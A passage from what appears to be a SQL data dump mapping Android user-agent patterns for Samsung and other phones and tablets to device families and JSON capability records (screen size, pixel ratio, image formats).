Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G901F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100MU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J100Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J110F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J110G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J110H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J110H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J110L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-J701M/DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N7500Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N7502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N7505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N7505L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N7507) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N750K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N750L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N750S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N9005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N900P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N900T) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N900V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N900W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N910C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N910H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N910T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N910V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-N915F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-P605) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-S766C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-S820L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-S975L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T110) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T111) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T111) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T113) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T113NU) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T116) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T116BU) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T116NU) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T210) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T210) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T230) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T230NU) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T231) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T235) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T310) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T310) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T311) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T311) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T320) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T520) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T525) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T530) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T560) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T561) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T561M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-T705) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SMART FLY V500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SMART Start) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SO-01F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SO-04E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SOL22) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SOL23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SP-5050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SPARK2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SPH-D710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SPH-L710) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SPH-L710T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SPH-L720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 